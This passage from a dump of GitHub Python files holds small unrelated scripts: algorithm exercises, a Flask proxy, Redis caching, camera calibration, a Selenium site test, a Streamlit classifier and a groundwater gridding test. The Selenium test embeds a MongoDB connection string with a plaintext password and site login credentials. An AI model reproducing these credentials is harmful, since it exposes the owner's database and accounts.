water_levels}\n","repo_name":"matsjp/kartverket_tide_api","sub_path":"kartverket_tide_api/parsers/locationdataparser.py","file_name":"locationdataparser.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18170289082","text":"class Solution:\n def valid_anagram(self, s1, s2):\n # hash table\n d1 = dict()\n d2 = dict()\n if len(s1) != len(s2):\n return False\n for i in range(len(s1)):\n if s1[i] in d1:\n d1[s1[i]] += 1\n else:\n d1[s1[i]] = 1\n if s2[i] in d2:\n d2[s2[i]] += 1\n else:\n d2[s2[i]] = 1\n return d1 == d2\n \n \n # Sorted (alternative approach; unreachable after the return above)\n s1_list = sorted(s1)\n s2_list = sorted(s2)\n return \"\".join(s1_list) == \"\".join(s2_list)\n","repo_name":"AnnaDai1001/Python_practice_log","sub_path":"Leetcode/ByTitle/242_valid_anagram.py","file_name":"242_valid_anagram.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41288711350","text":"import flask\r\nfrom requests import get\r\n\r\nMAGICBUS_API_KEY = \"\" # Insert API key here\r\n\r\napp = flask.Flask('__main__')\r\nSITE_NAME = 'https://mbus.ltp.umich.edu/bustime/api/v3/getpredictions?key=' + MAGICBUS_API_KEY + '&format=json&top=3&stpid='\r\n\r\n@app.route('/', defaults={'path': ''})\r\n@app.route('/<path>')\r\ndef proxy(path):\r\n resp = flask.Response(get(f'{SITE_NAME}{path}').content)\r\n resp.headers['Access-Control-Allow-Origin'] = '*'\r\n return resp\r\n\r\napp.run(host='localhost', port=8000)\r\n","repo_name":"montanamott/warmer-winter-walks","sub_path":"warmer-winter-walks/src/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8760792885","text":"from functools import wraps\n\nimport jsonpickle\n\nfrom backend.factory import redis_client\n\n\ndef redis_cached(expired_seconds: int = 180):\n \"\"\"\n Redis cache decorator\n :param expired_seconds:\n :return:\n \"\"\"\n\n def __actual_redis_cached(func):\n def __generate_list_args_token(__args_list) -> str:\n result_list = []\n for __args in __args_list:\n result_list.append(str(__args))\n return \",\".join(result_list)\n\n def __generate_dict_args_list(__args_dict) -> str:\n result_list = []\n for key, value in __args_dict.items():\n result_list.append(\"{0}={1}\".format(key, value))\n return \",\".join(result_list)\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n cache_key = \"cached:{0}:{1},{2}\".format(\n func.__name__,\n __generate_list_args_token(args),\n __generate_dict_args_list(kwargs),\n )\n redis_helper_instance = redis_client\n redis_result = redis_helper_instance.get(key=cache_key)\n\n if redis_result is None:\n value = func(*args, **kwargs)\n value_json = jsonpickle.encode(value)\n redis_helper_instance.set(\n key=cache_key, value=value_json, expired_seconds=expired_seconds\n )\n else:\n value = jsonpickle.decode(redis_result)\n return value\n\n return wrapper\n\n return __actual_redis_cached\n","repo_name":"Philogag/The-Project-Demo","sub_path":"backend/utility/redis_cache_helper.py","file_name":"redis_cache_helper.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"19221732072","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(0, 5*np.pi, 1000)\n\ny1 = np.sin(x)\ny2 = np.sin(2*x)\n\n# plt.fill fills the plotted region with a color\nplt.fill(x, y1, c=\"g\")\nplt.fill(x, y2, c=\"r\")\n# plt.fill_between fills the area between the two curves\nplt.fill_between(x, y1, y2, facecolor=\"yellow\")\n\nplt.show()","repo_name":"Arwen0905/Python_Test","sub_path":"0610/a0610_03_fill_between填滿之間_numpy_plot模組.py","file_name":"a0610_03_fill_between填滿之間_numpy_plot模組.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71020990188","text":"import torch\nimport numpy as np\nfrom torch_geometric.nn import knn_graph\nfrom typing import Tuple, Optional, Union\n\nfrom ..graph import Graph\n\n\ndef connect_knn(pos: torch.Tensor,\n k: int,\n period: Optional[Union[None, Tuple]] = None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Connects nodes using the k-nearest neighbors algorithm.\n \n Args:\n pos (torch.Tensor): Node positions.\n k (int): Number of nearest neighbors.\n period (Optional[Tuple[float, float]], optional): Period of the domain along each axis.\n If None, the domain is not periodic. 
If an element is `None`, the corresponding axis is not periodic.\n If an element is \"auto\", the corresponding axis is periodic and the period is computed as the difference\n between the maximum and minimum values of the corresponding axis.\n\n Returns:\n Tuple[torch.Tensor, torch.Tensor]: Edge index and edge attributes.\n \"\"\"\n dim = pos.size(1) # Dimension of the problem\n if dim == 2:\n if period is None:\n dx, dy = None, None\n else:\n dx, dy = period\n elif dim == 3:\n if period is None:\n dx, dy, dz = None, None, None\n else:\n dx, dy, dz = period\n else:\n raise ValueError(f\"Invalid dimension: {dim}, must be 2 or 3.\")\n # Compute coordinates for knn algorithm\n if dx is not None: # If periodicity is established along the x-axis\n if dx == \"auto\": dx = pos[:,0].max() - pos[:,0].min()\n x = torch.stack( (torch.cos(2*np.pi/dx*pos[:,0]), torch.sin(2*np.pi/dx*pos[:,0])), dim=1 )\n else: # If periodicity is not established along the x-axis\n x = pos[:,0].unsqueeze(1)\n if dy is not None: # If periodicity is established along the y-axis\n if dy == \"auto\": dy = pos[:,1].max() - pos[:,1].min()\n y = torch.stack( (torch.cos(2*np.pi/dy*pos[:,1]), torch.sin(2*np.pi/dy*pos[:,1])), dim=1 )\n else: # If periodicity is not established along the y-axis\n y = pos[:,1].unsqueeze(1)\n if dim == 3:\n if dz is not None: # If periodicity is established along the z-axis\n if dz == \"auto\": dz = pos[:,2].max() - pos[:,2].min()\n z = torch.stack( (torch.cos(2*np.pi/dz*pos[:,2]), torch.sin(2*np.pi/dz*pos[:,2])), dim=1 )\n else: # If periodicity is not established along the z-axis\n z = pos[:,2].unsqueeze(1)\n # Concatenate coordinates\n coordinates = torch.cat( (x, y), dim=1) if dim == 2 else torch.cat( (x, y, z), dim=1)\n # Compute edge_index applying knn to the coordinates\n edge_index = knn_graph(coordinates, k=k)\n # Compute edge_attr\n edge_attr = pos[edge_index[1]] - pos[edge_index[0]]\n # Apply periodicity to edge_attr\n if dx is not None:\n edge_attr[edge_attr[:,0] < -dx/2.,0] += dx\n edge_attr[edge_attr[:,0] > dx/2.,0] -= dx\n if dy is not None:\n edge_attr[edge_attr[:,1] < -dy/2.,1] += dy\n edge_attr[edge_attr[:,1] > dy/2.,1] -= dy\n if dim == 3 and dz is not None:\n edge_attr[edge_attr[:,2] < -dz/2.,2] += dz\n edge_attr[edge_attr[:,2] > dz/2.,2] -= dz\n return edge_index, edge_attr\n\n\nclass ConnectKNN():\n \"\"\"Transformation class to connect nodes using the k-nearest neighbors algorithm.\n \n Args:\n k (int): Number of nearest neighbors.\n period (Optional[Tuple[float, float]], optional): Period of the domain along the $x$- and $y$-axes.\n\n Methods:\n __call__(graph: Graph) -> Graph: Connects nodes using the k-nearest neighbors algorithm. 
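\n\n Example:\n A minimal usage sketch (illustrative only: the neighbor count is arbitrary, the\n \"auto\" period along the first axis is an assumed choice, and `graph` stands for\n any Graph whose `pos` tensor is already populated):\n\n >>> transform = ConnectKNN(k=6, period=(\"auto\", None))\n >>> graph = transform(graph) # fills graph.edge_index and graph.edge_attr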
\n \"\"\"\n\n def __init__(self,\n k: int,\n period: Optional[Union[Tuple[float,float], Tuple[float,float,float]]] = (None, None),):\n self.k = k\n self.period = period\n\n def __call__(self, graph: Graph):\n graph.edge_index, graph.edge_attr = connect_knn(graph.pos, self.k, period=self.period)\n return graph","repo_name":"mario-linov/graphs4cfd","sub_path":"graphs4cfd/transforms/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"}
+{"seq_id":"19137287747","text":"import json\nimport os\nimport sys\n\nimport paramiko\n\nfrom backend.helpers.logger_settings import logger\n\n\ndef get_bookmarks_from_local_directory():\n with open(JSONIN, \"r\", encoding='utf-8') as f:\n bookmarks = json.load(f)\n\n return bookmarks\n\n\ndef get_bookmarks_via_ssh():\n\n host, port, username, password, command = os.environ['SSH_HOST'], int(os.environ['SSH_PORT']), os.environ[\n 'SSH_USERNAME'], os.environ['SSH_PASSWORD'], os.environ['SSH_COMMAND']\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(host, port, username, password)\n\n stdin, stdout, stderr = ssh.exec_command(command)\n bookmarks = json.loads(''.join(stdout.readlines()))\n\n return bookmarks\n\n\n# TODO: this may work poorly, since it should only be called once per pass of the loop\ndef find_folder(tree, depth=0):\n for count, elem in enumerate(tree):\n\n # the first if/else handles depth=0, i.e. the minimal, root-level nesting\n # if we found the notion bookmarks folder - return its contents\n if int(elem['id']) == folder_id:\n return elem\n\n # if this is not the notion folder\n else:\n # if this is a link, or an element already present in folders_ids (i.e. we have run into it before) - skip it\n if elem['type'] == 'url' or elem['id'] in folders_ids:\n continue\n\n # if this is a folder - append a string like 'id folder_name' to path and increase the depth\n elif elem['type'] == 'folder':\n folders_ids.append(elem['id'])\n\n path.append(f'{count} {elem[\"name\"]}')\n depth = depth + 1\n\n # TODO: not quite clear why this is needed; could not find a use case\n debug = find_folder(elem['children'], depth)\n\n if debug:\n return debug\n\n # if the nesting level is 1, 
clear path and continue the search (since there is no nesting, we can go back to the zero, i.e. root, level)\n if len(path) == 1:\n path.clear()\n\n find_folder(first_stage, 0)\n\n # if the nesting level is greater than 1\n else:\n new_path = path[0:depth - 1]\n path.clear()\n path.append(*new_path)\n\n for count in path:\n new_tree = first_stage[int(count.split()[0])]\n\n debug = find_folder(new_tree['children'], depth - 1)\n if debug:\n return debug\n\n\ndef parse_bookmarks():\n if os.environ['VIA_SSH'] == 'False':\n bookmarks = get_bookmarks_from_local_directory()\n\n elif os.environ['VIA_SSH'] == 'True':\n bookmarks = get_bookmarks_via_ssh()\n\n else:\n logger.critical('VIA_SSH env var is not set properly')\n sys.exit()\n\n global first_stage\n first_stage = bookmarks['roots']['bookmark_bar']['children']\n folder_data = find_folder(first_stage)\n\n try:\n bookmarks = [{\"title\": children['name'], \"page_url\": children.get('url'), \"id\": children['id']} for children in\n folder_data['children'] if children.get('url')]\n\n return bookmarks\n\n except TypeError as e:\n logger.critical('You may have specified the wrong bookmarks folder id in the environment variables')\n logger.debug(f'\"error\": {e}')\n\n\nJSONIN = os.environ['JSONIN']\n\nfolders_ids = []\nfolder_id = int(os.environ['BOOKMARKS_FOLDER'])\n\npath = []\n","repo_name":"HappyCthulhu/notion_plugin","sub_path":"backend/helpers/parse_bookmarks.py","file_name":"parse_bookmarks.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39492506984","text":"# 10001st prime\n\n# By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n# What is the 10 001st prime number?\n\ndef SieveOfEratosthenes(n):\n\n # Boolean array with 0 to n(inclusive) \n prime = [True for _ in range(n + 1)]\n\n p = 2\n while (p * p <= n):\n if prime[p] == True:\n # setting all the multiples of p, from p^2 on, to be false\n for i in range(p*p, n + 1, p):\n prime[i] = False\n p += 1\n \n primes = []\n\n for p in range(2, n+1):\n if prime[p]:\n primes.append(p)\n\n return primes\n\nn = 1000001\nprimes = SieveOfEratosthenes(n)\nprint(primes[10000])","repo_name":"AabhasKrJha/ProjectEuler","sub_path":"problem_007/problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17814003959","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nCreated on Thu Nov 30 13:23:58 2017\n\n@author: Anil\n\"\"\"\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport pandas as pd\n\ndef extract_avg_rest_rating():\n f = open(\"1 link to restaurants.txt\")\n f1 = open(\"3 other restaurants.txt\")\n f2 = open(\"4 avg rest rating.txt\", 'a+')\n pg = 1
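\n # NOTE: the input link files are assumed to be tab-separated with the\n # restaurant name in the first column (inferred from the parsing below), and\n # pg indexes the locally cached pages \"restaurantFiles/<restName>/<restName><pg>.html\".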
\n for line in f:\n restName = line.strip('\\n').split('\\t')[0]\n if not os.path.isfile(\"restaurantFiles/\" + restName + \"/\" + restName + str(pg) + \".html\"): continue\n \n r = open(\"restaurantFiles/\" + restName + \"/\" + restName + str(pg) + \".html\")\n soup = BeautifulSoup(r,'lxml') # parse the html content of the file\n r.close()\n try:\n rev = soup.find('div',{'class':re.compile('rating-info clearfix')})\n rating = rev.find('img',{'class':re.compile('offscreen')})['alt'].split(' ')[0]\n except:\n print(\"Exception occurred\")\n rating = 1\n print(restName + '\\t' + str(rating))\n f2.write('\\n' + restName + '\\t' + str(rating))\n f.close()\n \n for line in f1:\n restName = line.strip('\\n').split('\\t')[0]\n if not os.path.isfile(\"restaurantFiles/otherFiles/\" + restName + \".html\"): continue\n r = open(\"restaurantFiles/otherFiles/\" + restName + \".html\")\n soup = BeautifulSoup(r,'lxml') # parse the html content of the file\n r.close()\n try:\n rev = soup.find('div',{'class':re.compile('rating-info clearfix')})\n rating = rev.find('img',{'class':re.compile('offscreen')})['alt'].split(' ')[0]\n except:\n print(\"Exception occurred\")\n rating = 1\n print(restName + '\\t' + str(rating))\n f2.write('\\n' + restName + '\\t' + str(rating))\n f1.close() \n\ndef final_file():\n user_file = open(\"3 ratings by user.txt\")\n rest_file = open(\"4 avg rest rating.txt\")\n final_file = open(\"5 final file.txt\", 'a+')\n df2 = pd.read_table(rest_file, sep = '\\t')\n df2 = df2.drop_duplicates()\n rest_file.close()\n flag=0 #to skip first line\n for line in user_file:\n if flag == 0: flag = 1; continue\n restName = line.strip('\\n').split('\\t')[1]\n print(restName)\n if restName in df2.restName.tolist():\n print(line.strip(\"\\n\") + \"\\t\" + str(df2.avgRatingToThisRest[df2.restName==restName].item()))\n final_file.write(\"\\n\" + line.strip(\"\\n\") + \"\\t\" + str(df2.avgRatingToThisRest[df2.restName==restName].item()))\n final_file.close()\n user_file.close()\n \nextract_avg_rest_rating()\nfinal_file()\n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"athadani2704/school_projects","sub_path":"Yelp Rating Prediction/python files/4 final dataset creation.py","file_name":"4 final dataset creation.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17448744994","text":"from collections import deque\r\n\r\nn, k = map(int, input().split())\r\n\r\nbelt = deque(list(map(int, input().split())))\r\nrobot = deque([0] * n)\r\n\r\ncount = 1\r\nwhile True:\r\n # rotate by one step\r\n belt.rotate(1)\r\n robot.rotate(1)\r\n robot[-1] = 0\r\n\r\n # move all robots\r\n if sum(robot):\r\n for i in range(n-2, 0, -1):\r\n # if the current cell has a robot, the next cell is empty, and its durability is at least 1\r\n if belt[i+1] > 0 and robot[i+1] == 0 and robot[i] == 1:\r\n belt[i+1] -= 1\r\n robot[i+1] = 1\r\n robot[i] = 0\r\n # take the robot off at the last cell\r\n robot[-1] = 0\r\n\r\n # if the loading cell's durability is positive and it has no robot, place a new robot\r\n if belt[0] > 0 and robot[0] == 0:\r\n robot[0] = 1\r\n belt[0] -= 1\r\n\r\n\r\n if belt.count(0) >= k:\r\n print(count)\r\n break\r\n else:\r\n count += 1","repo_name":"leesh26/MyAlgorithm","sub_path":"백준/Gold/20055. 컨베이어 벨트 위의 로봇/컨베이어 벨트 위의 로봇.py","file_name":"컨베이어 벨트 위의 로봇.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72486144106","text":"''' Property of: Target Acquired (Design Team 4)\n\n Purpose of Use: Raspberry Pi HQC Calibration\n \n Description: This script is an application of the camera calibration algorithm presented in the \n OpenCV tutorial and uses distorted images of a chessboard to obtain intrinsic \n properties of a camera such as focal length and optic center. Ultimately, \n these properties generate two variables: a distortion coefficient vector, \"dist\", and a camera calibration \n matrix, \"mtx\", that will be hardcoded in the \"thresholding.py\" script used\n for target recognition and the \"stitching.py\" script used for map generation\n to undistort images of the field. This will theoretically improve the accuracy\n of image identification, GPS calculations, and map stitching. 
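\n\n Illustrative note (an assumption, not part of the original pipeline): once\n \"mtx\" and \"dist\" are hardcoded downstream, a frame could be undistorted with\n a call along the lines of undistorted = cv.undistort(frame, mtx, dist, None, mtx),\n where \"frame\" is a hypothetical input image. 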
''' \n\n\n# Import modules\n\nimport numpy as np\nimport cv2 as cv\nimport glob\nimport os\n\nos.chdir(\"/Users/jcam98/Desktop/EducationInstitutions/UniversityofTexas/Courses/SPRING_2022/COE_374/Design_Project/Locally_Developed_Files/Camera_Calibration/Test_Images/trial_5\")\n\n# termination criteria\ncriteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n# Define interior (non-dimensionalized) object points:L(0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((8*6,3), np.float32)\nobjp[:,:2] = np.mgrid[0:6,0:8].T.reshape(-1,2)\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\nimages = glob.glob('/Users/jcam98/Desktop/EducationInstitutions/UniversityofTexas/Courses/SPRING_2022/COE_374/Design_Project/Locally_Developed_Files/Camera_Calibration/Team_Chessboard_Images/Black_White/It_4/*.jpg')\n\nfor fname in images:\n img = cv.imread(fname) # Read image file into \"img\" object\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY) # Map RGB colorspace to Grayscale colorspace\n # Find the chess board corners\n ret, corners = cv.findChessboardCorners(gray, (6,8), None)\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n corners2 = cv.cornerSubPix(gray,corners, (11,11), (-1,-1), criteria)\n imgpoints.append(corners)\n # Draw and display the corners\n cv.drawChessboardCorners(img, (6,8), corners2, ret)\n cv.imshow('img', img)\n cv.waitKey(5000)\ncv.destroyAllWindows()\n\n# Return camera matrix, distortion coefficients, rotation and translation vectors\n\nret, mtx, dist, rvecs, tvecs = cv.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\nimages = sorted(glob.glob('*.jpg'), key=os.path.basename)\n\ncount = 1\nfor i in images: \n\n i = cv.imread(i)\n\n h, w = i.shape[:2]\n\n # # Obtain new camera matrix for removing distortion from input image\n \n newcameramtx, roi = cv.getOptimalNewCameraMatrix(mtx, dist, (w,h), 1, (w,h))\n \n # # Undisortion Method 1: cv.undistort() \n \n #dst = cv.undistort(i, mtx, dist, None, newcameramtx)\n \n # # Undistortion Method 2: Using remapping\n \n mapx,mapy = cv.initUndistortRectifyMap(mtx,dist,None,newcameramtx,(w,h),5)\n dst = cv.remap(i,mapx,mapy,cv.INTER_LINEAR)\n \n #crop the image\n x, y, w, h = roi\n dst = dst[y:y+h, x:x+w]\n \n out_file = 'undst/image' + str(count) + '_undst.jpg'\n \n cv.imwrite(out_file, dst)\n \n count = count + 1\n ","repo_name":"JCam98/COE_374","sub_path":"Source_Files/Final/camera_calibration_standard.py","file_name":"camera_calibration_standard.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11874255310","text":"from time import sleep\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom pymongo import MongoClient\n\n\n# Necessary data\nmain_url = 'http://pt.dailybuzzbd.com/'\nemail = 'zahir@gmail.com'\npassword = '1234'\n\n# Data for new product.\nselector_name = '.apphub_AppName'\nselector_price = '.discount_final_price'\nselector_image = '.game_header_image_full'\nurl = 'https://store.steampowered.com/app/1777620/Soul_Hackers_2/'\n\n# xpaths\nhamburger_xpath = '//*[@id=\"dropdown-hamburger\"]'\nsignin_xpath = '/html/body/nav/nav[1]/div[2]/ul/li[1]/a'\nsignin_email_xpath = 
'//*[@id=\"email\"]'\nsignin_password_xpath = '//*[@id=\"password\"]'\nsignin_button_xpath = '/html/body/main/form/button'\nadmin_panel_xpath = '/html/body/nav/nav[1]/div[2]/ul/li[2]/a'\nnew_product_url_xpath = '//*[@id=\"new-product-url\"]'\nnew_product_name_xpath = '/html/body/main/div/div[1]/form/input[2]'\nnew_product_price_xpath = '/html/body/main/div/div[1]/form/input[3]'\nnew_product_image_xpath = '/html/body/main/div/div[1]/form/input[4]'\nnew_product_button_xpath = '/html/body/main/div/div[1]/form/button'\ndelete_product_xpath = '/html/body/main/nav/a[2]'\ndelete_product_input_xpath = '//*[@id=\"delete-product-input\"]'\ndelete_product_search_xpath = '/html/body/main/div/div[2]/form/button'\ndelete_product_button_xpath = '/html/body/main/div/div[2]/div/div[1]/button'\n\n# Connecting to mongodb\ndatabase_url = 'mongodb+srv://Zahir:zahir54uli@pricetracker.iopmqeb.mongodb.net/?retryWrites=true&w=majority'\nclient = MongoClient(database_url)\ndb = client.priceTracker\n\n# Initializing Driver.\noptions = Options()\noptions.headless = True\ndriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n\n# Going to the page.\ndriver.get(main_url)\n\n# Go to Sign In page.\nhamburger = driver.find_element_by_xpath(hamburger_xpath)\nsignin = driver.find_element_by_xpath(signin_xpath)\nhamburger.click()\nsignin.click()\n# Sign In.\nsignin_email = driver.find_element_by_xpath(signin_email_xpath)\nsignin_password = driver.find_element_by_xpath(signin_password_xpath)\nsignin_button = driver.find_element_by_xpath(signin_button_xpath)\nsignin_email.send_keys(email)\nsignin_password.send_keys(password)\nsignin_button.click()\n# Go to admin panel\nhamburger = driver.find_element_by_xpath(hamburger_xpath)\nadmin_panel = driver.find_element_by_xpath(admin_panel_xpath)\nhamburger.click()\nadmin_panel.click()\n# Insert new data.\nnew_product_url = driver.find_element_by_xpath(new_product_url_xpath)\nnew_product_name = driver.find_element_by_xpath(new_product_name_xpath)\nnew_product_price = driver.find_element_by_xpath(new_product_price_xpath)\nnew_product_image = driver.find_element_by_xpath(new_product_image_xpath)\nnew_product_button = driver.find_element_by_xpath(new_product_button_xpath)\nnew_product_url.send_keys(url)\nnew_product_name.send_keys(selector_name)\nnew_product_price.send_keys(selector_price)\nnew_product_image.send_keys(selector_image)\nnew_product_button.click()\n\n# Wait for data to be stored in the database.\nsleep(5)\n\n# Check if the data has been stored.\n\nquery_count = db.scrapes.count_documents({'url': url})\n\n\nif query_count > 0:\n print('*** Data Input Successful! ***')\nelse:\n print('*** Data Input unsuccessful! ***')\n\n# Delete data.\ndelete_product = driver.find_element_by_xpath(delete_product_xpath)\ndelete_product_input = driver.find_element_by_xpath(delete_product_input_xpath)\ndelete_product_search = driver.find_element_by_xpath(delete_product_search_xpath)\ndelete_product.click()\ndelete_product_input.send_keys('Forza Horizon 5')\ndelete_product_search.click()\n\n# Wait for fetch to work and delete.\nsleep(5)\ndelete_product_button = driver.find_element_by_xpath(delete_product_button_xpath)\ndelete_product_button.click()\n# Wait for data to be deleted from the database.\nsleep(5)\n\nquery_count = db.scrapes.count_documents({'url': url})\n\n\nif query_count == 0:\n print('*** Data Delete Successful! ***')\nelse:\n print('*** Data Delete unsuccessful! 
***')\n\n# Quiting the driver.\ndriver.quit()\n\n\n","repo_name":"zahlambo/Price_Tracker","sub_path":"Testing/Zahir 011181211/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37082960915","text":"import torch\nimport streamlit as st\nfrom PIL import Image\nfrom torchvision import transforms\nimport torch.nn as nn\n\nclass NewModel(nn.Module):\n\n def __init__(self): \n super(NewModel, self).__init__() \n\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, padding=1)\n self.relu1 = nn.ReLU()\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1) \n self.relu2 = nn.ReLU() \n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) \n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1) \n self.relu3 = nn.ReLU() \n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2) # Fully connected layers \n self.fc1 = nn.Linear(128 * 16 * 16, 128) # 16x16 is the feature map size after 3 pooling layers \n self.relu4 = nn.ReLU() \n self.dropout1 = nn.Dropout(0.1)\n self.fc2 = nn.Linear(128, 5) \n\n def forward(self, x): \n x = self.pool1(self.relu1(self.conv1(x))) \n x = self.pool2(self.relu2(self.conv2(x))) \n x = self.pool3(self.relu3(self.conv3(x))) \n x = x.view(x.size(0), -1) # Flatten the tensor \n x = self.dropout1(x) \n x = self.relu4(self.fc1(x)) \n x = self.fc2(x) \n return x\n \ntransform = transforms.Compose([transforms.Resize((128, 128)),\n transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\nmodel = NewModel()\nmodel.load_state_dict(torch.load('model.pt', map_location='cpu'))\nmodel.eval()\ndef predict(image):\n image = Image.open(image)\n image = transform(image)\n image = image.unsqueeze(0)\n with torch.no_grad():\n output = model(image)\n _, predicted = torch.max(output.data, 1)\n return predicted.item()\n\npredictions_map = {\n 0: 'Bracelet',\n 1: \"Eyeglasses\",\n 2: \"Floppers\",\n 3: \"Ring\",\n 4: \"Watch\"\n }\n\nst.title(\"Wearable Accessories Classification\")\nst.write(\"A minimal classifier for wearable accessories using PyTorch and Streamlit can classify between 5 classes of wearable accessories - [ Bracelet, Eyeglasses, Floppers, Ring, Watch ].\")\nfile = st.file_uploader(\"Upload Inference Image\", type=[\"jpg\", \"png\", \"jpeg\"])\nif file:\n image = Image.open(file)\n st.image(image, width=300)\n with st.spinner(\"Fetching Results...\"):\n predictions = predict(file)\n print(type(predictions))\n st.write(predictions_map[predictions])\n","repo_name":"eternal-f1ame/MP-1-VCL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38867334757","text":"import shutil\nimport os\nimport numpy as np\nimport flopy\nfrom flopy.utils.gridgen import Gridgen\n\ncpth = os.path.join('temp', 't061')\n# delete the directory if it exists\nif os.path.isdir(cpth):\n shutil.rmtree(cpth)\n# make the directory\nos.makedirs(cpth)\n\nexe_name = 'gridgen'\nv = flopy.which(exe_name)\n\nrun = True\nif v is None:\n run = False\n\n\ndef test_gridgen():\n\n # define the base grid and then create a couple levels of nested\n # refinement\n Lx = 10000.\n Ly = 10500.\n nlay = 3\n nrow = 21\n ncol = 20\n delr = Lx / ncol\n delc = Ly / nrow\n top = 400\n botm = [220, 200, np.random.random((nrow, ncol))]\n\n # create a dummy dis package for gridgen\n ms = 
flopy.modflow.Modflow()\n dis5 = flopy.modflow.ModflowDis(ms, nlay=nlay, nrow=nrow, ncol=ncol,\n delr=delr,\n delc=delc, top=top, botm=botm)\n\n sim = flopy.mf6.MFSimulation()\n gwf = flopy.mf6.ModflowGwf(sim)\n dis6 = flopy.mf6.ModflowGwfdis(gwf, nlay=nlay, nrow=nrow, ncol=ncol,\n delr=delr,\n delc=delc, top=top, botm=botm)\n\n gridgen_ws = cpth\n g = Gridgen(dis5, model_ws=gridgen_ws, exe_name=exe_name)\n g6 = Gridgen(dis6, model_ws=gridgen_ws, exe_name=exe_name)\n\n rf0shp = os.path.join(gridgen_ws, 'rf0')\n xmin = 7 * delr\n xmax = 12 * delr\n ymin = 8 * delc\n ymax = 13 * delc\n rfpoly = [[[(xmin, ymin), (xmax, ymin), (xmax, ymax), (xmin, ymax),\n (xmin, ymin)]]]\n g.add_refinement_features(rfpoly, 'polygon', 1, range(nlay))\n g6.add_refinement_features(rfpoly, 'polygon', 1, range(nlay))\n\n rf1shp = os.path.join(gridgen_ws, 'rf1')\n xmin = 8 * delr\n xmax = 11 * delr\n ymin = 9 * delc\n ymax = 12 * delc\n rfpoly = [[[(xmin, ymin), (xmax, ymin), (xmax, ymax), (xmin, ymax),\n (xmin, ymin)]]]\n g.add_refinement_features(rfpoly, 'polygon', 2, range(nlay))\n g6.add_refinement_features(rfpoly, 'polygon', 2, range(nlay))\n\n rf2shp = os.path.join(gridgen_ws, 'rf2')\n xmin = 9 * delr\n xmax = 10 * delr\n ymin = 10 * delc\n ymax = 11 * delc\n rfpoly = [[[(xmin, ymin), (xmax, ymin), (xmax, ymax), (xmin, ymax),\n (xmin, ymin)]]]\n g.add_refinement_features(rfpoly, 'polygon', 3, range(nlay))\n g6.add_refinement_features(rfpoly, 'polygon', 3, range(nlay))\n\n # if gridgen executable is available then do the main part of the test\n if run:\n\n # Use gridgen to build the grid\n g.build()\n g6.build()\n\n # test the different gridprops dictionaries, which contain all the\n # information needed to make the different discretization packages\n gridprops = g.get_gridprops_disv()\n gridprops = g.get_gridprops()\n #gridprops = g.get_gridprops_disu6()\n\n # test the gridgen point intersection\n points = [(4750., 5250.)]\n cells = g.intersect(points, 'point', 0)\n n = cells['nodenumber'][0]\n msg = ('gridgen point intersect did not identify the correct '\n 'cell {} <> {}'.format(n, 308))\n assert n == 308, 